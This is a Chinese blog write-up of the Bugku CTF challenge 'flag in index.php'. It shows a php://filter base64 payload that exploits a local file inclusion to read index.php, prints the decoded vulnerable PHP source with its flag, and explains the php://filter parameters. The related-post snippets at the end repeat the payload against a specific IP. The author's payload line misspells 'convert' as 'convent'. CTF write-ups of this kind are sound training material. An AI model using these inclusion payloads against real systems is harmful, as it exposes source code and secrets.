wp-bugku-flag在index.php中

最新推荐文章于 2022-07-29 15:17:02 发布
最新推荐文章于 2022-07-29 15:17:02 发布
阅读量559 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf-wp 文章标签: php://filter wp bugku ctf flag在index.php中
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/key_nothing/article/details/88394476

打开连接
在这里插入图片描述
查看源码发现:
在这里插入图片描述
文件包含。
使用php://filter读取index.php的源代码
构造payload:

index.php?file=php://filter/read=convent.base64-encode/resource=index.php

在这里插入图片描述
得到index.php源代码的base64
解密得到源代码:

<html>

    <title>Bugku-ctf</title>

    

<?php

	error_reporting(0);

	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}

	$file=$_GET['file'];

	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){

		echo "Oh no!";

		exit();
	}

	include($file); 

//flag:flag{edulcni_elif_lacol_si_siht}

?>

</html>

得到flag。

知识点:php://filter协议

php://filter可以作为一个中间流来处理其他流,具有四个参数:

resource=<要过滤的数据流> 这个参数是必须的。它指定了你要筛选过滤的数据流。
read=<读链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
write=<写链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
<;两个链的筛选列表> 任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

例子:

<?php
#这里没有指定过滤器
readfile("php://filter/resource=http://www.example.com");
?>

<?php
/* 这会以大写字母输出 www.example.com 的全部内容 */
readfile("php://filter/read=string.toupper/resource=http://www.example.com");

/* 这会和以上所做的一样,但还会用 ROT13 加密。 */
readfile("php://filter/read=string.toupper|string.rot13/resource=http://www.example.com");
?>
<?php
/* 使用base64编码读出index.php文件源代码。*/
index.php?file=php://filter/read=convent.base64-encode/reource=index.php
?>

本题需读出index.php的源代码,故构造payload为:

index.php?file=php://filter/read=convent.base64-encode/resource=index.php
引入flag.php文件,WEB_flagindex
weixin_28888459的博客
03-10 981
题解:打开题目 点击进去,除了一个test5后什么也没有,但是发现了URL中的地址后缀变化,是典型的文件包含漏洞,file关键字是提示,其实也是CTF的套路 题目标题就说明了,flagindex中,要用到php的封装协议,在文件后缀添加 ?file=php://filter/read=convert.base64-encode/resource=index.php即http://123.206...
CTF平台题库writeup(二)--BugKuCTF-WEB(部分)
渗透、攻防、CTF、编程
06-26 4379
web2 flag源码的注释里 计算器 改一下text文本框的最大输入位数>1即可 web基础$_GET GET方式传参即可 web基础$_POST post方式传参即可 矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } 这题要求传参num不能是数字,而且num=1,一开始没有什么思路,认为是弱类型的绕过,传了true进去,发现无效,问
flag就在flag.php
热门推荐
Peithon的博客
05-13 10万+
Web1 题目地址 1.访问题目存在一个登录界面 2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示 3.访问flag.php,试试可不可以得到flag 提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的 4.抓包 发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密...
bugku flagindex.php
Superpig的博客
11-09 546
思路 点击链接后,看见参数file=show.php ,典型的本地文件泄露 破解 访问http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php即得index.php源码的base64编码,解码即可得到flag(在注释里) 原理 1、php://...
ctf提示flagphp里,BugkuCTFflagindex里;输入密码查看flag
weixin_39952502的博客
03-27 1984
flagindex里题目是这样:点击之后是这样:url变成了:http://123.206.87.240:8005/post/index.php?file=show.php看到大佬的解答,因为有file字样,联想到文件包含:利用xxe漏洞,直接获得源码:可以用如下一行代码将POST内容转换成base64编码并输出:readfile("php://filter/read=convert.base6...
flagindex
qq_43613772的博客
09-25 524
题目链接:http://123.206.87.240:8005/post/ 打开链接如下: 点击一下发现连接发生了变换,很明显falg与index.php有关且是以show.php为value的get请求 于是就想到php://filter 与文件包含(php的封装)有关。 构造连接http://123.206.87.240:8005/post/index.php?file=php://filt...
CTF/CTF练习平台-flagindex里【php://filter的利用】
ny18002122997的博客
01-14 442
原题内容: http://120.24.86.145:8005/post/ Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这里总结下自己的理解: 首先打开这道题,页面只给你click me? no 点击进去显示test5 第一步,查看源代码,无果 第二步bp,无果 结合到题目,flagindex里,大胆尝试http://120.24.86.145:8005/post/index.php,可惜和之前一样 注意到了传值为http://1...
bugku_noteasytrick
weixin_50076644的博客
07-29 833
bugku_web_noteasytrick
BugkuCTF题库部分wp
qq_45716477的博客
05-10 788
目录WEB0x01 web10x02 web20x03 web30x04 web40x05 web50x06 web60x07 web70x08 web80x09 web90x0A web100x0B web110x0C web12 WEB 0x01 web1 查看页面源代码即可获得flag。 0x02 web2 发现输入框里只能输入一个数字。 检查源代码,发现输入长度限制为1。修改为2即可输入验证码。 0x03 web3 简单的get传参。 0x04 web4 简单的post传参。使用hackb
引入flag.php文件,CTF/CTF練習平台-flagindex里【php://filter的利用】
weixin_36165049的博客
03-10 884
原題內容:http://120.24.86.145:8005/post/Mark一下這道題,前前后后弄了兩個多小時,翻了一下別的博主的wp感覺還是講的太粗了,這里總結下自己的理解:首先打開這道題,頁面只給你click me? no點擊進去顯示test5第一步,查看源代碼,無果第二步bp,無果結合到題目,flagindex里,大膽嘗試http://120.24.86.145:8005/post/i...
index.php源代码分析
Javahaoshuang3394的专栏
05-29 1043
&lt;script&gt;function StorePage(){d=document;t=d.selection?(d.selection.type!='None'?d.selection.createRange().text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://www.365key....
php 源码 mrp,index.php
weixin_31880681的博客
04-03 555
#入口文件define('APP_DIR_NAME', 'application'); #程序目录define('SYS_DIR_NAME', 'core'); #系统目录define('DEFAULT_CONTROL', 'Index'); #默认控制器define('DEFAULT_CONTROL_METHO...
index.php代码,index.php
weixin_32382353的博客
03-19 390
//版权所有(C) 2014 www.ilinei.comdefine('DEBUG', true);//加载启动文件require_once './source/boot.php';//检查是否安装if(!$config['installed']){header('location:_install/install.php');exit(0);}try{//全局皮肤变量$THEME = $set...
ECSHOP 源码分析(index.php
瓶子 の Study
06-30 1582
 /***********************************************define -- Defines a named constant定义常量bool define ( string name, mixed value [, bool case_insensitive])参数说明name :常量名value:常量值case_insensitive:大小写区分 t
phpwind源码解析------index.php
走向架构师之路
04-18 1万+
phpwind的功能很强悍,设计理念也非常不错,但代码写得有些乱,不过可能是php本身的特点导致,让我们这些写惯了java的开发人员看起来极不习惯,并且源码里的注释少得可怜,只能自己边看边加了,今天看了看了根目录下的index.php,带注释的源码如下:<?phpdefine(SCR,index);require_once(global.php);include_onc
织梦index.php源代码,windframework轻量级PHP开源框架
weixin_30083369的博客
03-10 291
windframework是一个轻量级的php开源框架。它以组件工厂为核心,提供了像MVC,数据持久化,视图模板引擎等应用技术。此外windframework采取了一种组件化的开发模式。虽然目前的组件库还不算丰富健壮,但是基于这种开发模式,使组件的扩展变得非常的容易。windframework拥有一个强健的内核,它实现了基于配置的Ioc控制反转技术。是开发者只需要简单的配置,就可以实现类的依赖注入...
织梦index.php源代码,怎么解决dede首页网址自动加上index.html
weixin_29340327的博客
03-10 881
怎样去掉dedecms5.7(织梦)首页url后index.html有三种方法1.去配置你的空间的默认首页地址。把index.html移到默认文本最前面。(确保你的默认文档里面有index.html)这里就不多讲,下面讲解下织梦程序本身的方法。2.编辑打开include/channelunit.func.php页面查找$PubFields['templetdef'] = $cfg_templets...
Lavavel源码剖析之index.php介绍(一)
Attitude_do_it的博客
11-23 1449
内心独白 用了将近三年的Laravel,对框架的使用也算是比较熟练了,也曾尝试去阅读源码,但是结果是令人沮丧的,Laravel的优雅,一度让我放弃了对它的探索,最近手头上比较闲,下定决心完整的读了下来,过程虽然很艰辛,但是收获颇丰,并且让我得到了比项目做完更大的成就感。 正文开始 首先,不用多说,我们需要先定位到框架的入口文件public目录下的index.php,看看它都做了什么。 因为我不想放过Laravel的任何一个优雅的细节,所以我连注释都没有放过,以我小学英语的水平,也不知道哪里来的自信。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值